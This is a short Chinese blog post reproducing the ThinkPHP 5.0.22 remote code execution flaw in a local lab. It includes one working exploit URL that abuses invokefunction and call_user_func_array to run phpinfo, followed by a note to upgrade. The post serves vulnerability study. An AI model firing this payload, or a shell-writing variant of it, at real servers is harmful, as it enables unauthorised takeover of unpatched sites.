thinkphp远程执行漏洞的本地复现

thinkphp远程执行漏洞的本地复现

0X00漏洞简介

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell(可以控制服务器)

0X01环境搭建

下载存在漏洞版本我下载的版本是thinkphp_5.0.22搭建好以后如图

 

0X02漏洞复现

构造几个特殊的url即可复现漏洞。

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

可得到phpinfo界面

0X03漏洞修复

建议升级到最新版本

posted @   L0ading  阅读(465)  评论(0编辑  收藏  举报
编辑推荐:
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
阅读排行:
· 新年开篇:在本地部署DeepSeek大模型实现联网增强的AI应用
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· Janus Pro:DeepSeek 开源革新,多模态 AI 的未来
· 上周热点回顾(1.20-1.26)
· 【译】.NET 升级助手现在支持升级到集中式包管理

喜欢请打赏

扫描二维码打赏

了解更多

点击右上角即可分享
微信分享提示